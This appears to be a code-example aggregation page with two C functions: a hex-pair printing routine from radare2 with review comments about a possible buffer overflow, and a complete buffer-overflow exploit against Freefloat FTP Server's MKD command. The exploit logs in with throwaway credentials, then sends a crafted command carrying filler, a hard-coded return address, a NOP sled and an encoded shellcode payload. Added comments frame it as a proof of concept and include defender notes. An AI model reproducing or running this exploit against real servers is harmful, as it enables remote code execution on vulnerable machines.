예제 #1
파일: print.c 프로젝트: rchiossi/radare2
// XXX: redesign ? :)
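/**
 * Render a string of hex digit pairs, optionally decorated with ANSI colour
 * and cursor-highlight escape sequences.
 *
 * @param p    Print context; reads flags (R_PRINT_FLAGS_COLOR), cur, ocur and
 *             cur_enabled.
 * @param str  NUL-terminated string consumed two characters at a time. A
 *             trailing unpaired character is ignored.
 * @param n    Value subtracted from the cursor positions to turn them into
 *             pair indices within str.
 * @return     Newly malloc()ed NUL-terminated string that the caller must
 *             free(), or NULL on NULL arguments, size overflow or allocation
 *             failure.
 */
R_API char *r_print_hexpair(RPrint *p, const char *str, int n) {
	const char *s, *lastcol = Color_WHITE;
	char *d, *dst;
	size_t len, cap;
	int colors, cur, ocur;
	int ch, i;

	if (!p || !str)
		return NULL;
	len = strlen (str);
	/* Refuse lengths for which (len+2)*32 would wrap around size_t. */
	if (len > ((size_t)-1) / 32 - 2)
		return NULL;
	/*
	 * Budget: 32 output bytes per input character (64 per pair). Each pair
	 * writes at most one reset, one invert, two lastcol sequences and the two
	 * digits, so the budget holds only while every Color_* string is short.
	 * NOTE(review): the Color_* lengths are not visible here and nothing
	 * enforces this bound; the original author flagged a possible overflow.
	 */
	cap = (len + 2) * 32;
	dst = (char *)malloc (cap);
	if (!dst)
		return NULL;
	colors = p->flags & R_PRINT_FLAGS_COLOR;
	/* XXX That's hacky.. but partially works */
	/* TODO: Use r_print_set_cursor for win support */
	cur = R_MIN (p->cur, p->ocur);
	ocur = R_MAX (p->cur, p->ocur);

	if (p->cur_enabled && cur==-1)
		cur = ocur;
	ocur++;
#if CURDBG
	/* Bounded write: the debug prefix can never exceed the allocation. */
	snprintf (dst, cap, "(%d/%d/%d/%d)", p->cur_enabled, cur, ocur, n);
	d = dst+ strlen(dst);
#else
	d = dst;
#endif
// TODO: Use r_cons primitives here
#define memcat(x,y) { memcpy(x,y,strlen(y));x+=strlen(y); }
	/*
	 * Require both characters of a pair. With an odd-length input the old
	 * "*s" test let s step over the terminator and read past the string.
	 */
	for (s=str, i=0 ; s[0] && s[1]; s+=2, d+=2, i++) {
		if (p->cur_enabled) {
			if (i==ocur-n) {
				memcat (d, "\x1b[0m");
			}
			/*
			 * Emitted for every pair while the cursor is enabled: the
			 * original unbraced "if" only guarded the reset above, despite
			 * the indentation. Behaviour is kept as it was.
			 */
			memcat (d, lastcol);
			if (i>=cur-n && i<ocur-n) {
				memcat (d, "\x1b[7m");
			}
		}
		if (colors) {
			if (s[0]=='0' && s[1]=='0') lastcol = Color_GREEN;
			else if (s[0]=='7' && s[1]=='f') lastcol = Color_YELLOW;
			else if (s[0]=='f' && s[1]=='f') lastcol = Color_RED;
			else {
				ch = r_hex_pair2bin(s);
				/* Other pairs keep the previous colour unless printable. */
				if (IS_PRINTABLE (ch))
					lastcol = Color_MAGENTA;
			}
			memcat (d, lastcol);
		}
		/* The two digits themselves; the loop header advances d past them. */
		memcpy (d, s, 2);
	}
	if (colors || p->cur_enabled)
		memcpy (d, Color_RESET, strlen (Color_RESET)+1);
	else *d = 0;
	return dst;
}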
예제 #2
/*
 * Proof-of-concept module, reproduced as published: it logs in to a
 * hard-coded FTP host and sends one 1006-byte "MKD" command.
 *
 * Layout of the command as assembled below:
 *   "MKD " (4) + 247 filler bytes + a hard-coded 4-byte value + 0x90 padding
 *   + an opaque byte payload (sc) + "\r\n" (2).
 * The size comment in the body calls the 4-byte value an address; what it
 * refers to on the target cannot be verified from this listing.
 *
 * module: only module->target.offset is read, and only to log it.
 * Returns 0 (as void *) unconditionally; no call result is checked.
 *
 * Defender notes: FTP control-channel commands are normally short and
 * printable, so an MKD argument close to 1 KB, or one carrying long runs of
 * 0x90 or other non-printable bytes, is a strong signal for network
 * detection. The server-side fix for this class of bug is to bound the
 * command argument length before copying it; DEP and ASLR reduce the value of
 * fixed addresses such as the one embedded here.
 */
void *freefloat_ftp_server_mkd_exploit(struct module_t *module)
{
	struct module_t *self;
	int sock_fd;
	char buffer[1024];         /* receive buffer for server replies */
	char attack_string[1006];  /* the complete MKD command line */
	char *sc;
	int space;
	int offset;                /* write position inside attack_string */
	char *junk;
	char *nops;

	offset = 0;
	space = 0;

	self =  module;

	/* Informational message, although it goes through print_error(). */
	print_error("self.offset = %d", self->target.offset);

	memset(&buffer, 0, 1024);

	/* Hard coded until i get a good options method setup */
	/* 10.69.69.208 is in private (RFC 1918) address space; port 21 is FTP. */
	/* NOTE(review): sock_fd is used below without checking for failure. */
	sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, 1024);

	/* Pre-fill the whole command buffer with 0x90 bytes. */
	memset(&attack_string, '\x90', 1006);

	/* Opaque payload bytes, kept exactly as published. */
	sc = 
	"\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9"
	"\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60"
	"\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3"
	"\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c"
	"\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe"
	"\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51"
	"\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a"
	"\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69"
	"\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1"
	"\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65"
	"\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2"
	"\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39"
	"\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88"
	"\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d"
	"\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4"
	"\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1"
	"\xa2\xeb\x2c";

	/* Total size - addrlen - offset - payload_len - 'MKD ' - 2 for \r\n*/
	space = (1006 - 4 - 247 - strlen(sc) - 4 - 2);

	/* make_buff() is defined elsewhere; presumably it returns a heap buffer
	 * filled with the given byte, since both results are free()d below. */
	junk = make_buff('A', 247);
	nops = make_buff('\x90', space);

	/* memcat() here is a five-argument helper defined elsewhere; presumably
	 * it appends at *offset within the 1006-byte limit and advances offset. */
	memcat(attack_string, 1006, &offset, "MKD ", 4);
	memcat(attack_string, 1006, &offset, junk, 247);
	memcat(attack_string, 1006, &offset, "\xEF\x31\x9D\x7C", 4);
	memcat(attack_string, 1006, &offset, nops, space);
	memcat(attack_string, 1006, &offset, sc, strlen(sc));
	memcat(attack_string, 1006, &offset, "\r\n", 2);

	/* Log in with throwaway credentials, then send the MKD command. */
	tcp_send_recv(sock_fd, "USER wtf\r\n", 11, buffer, 1024);
	tcp_send_recv(sock_fd, "PASS wtf\r\n", 11, buffer, 1024);
	tcp_send_recv(sock_fd, attack_string, 1006, buffer, 1024);

	free(junk);
	free(nops);

	return 0;
}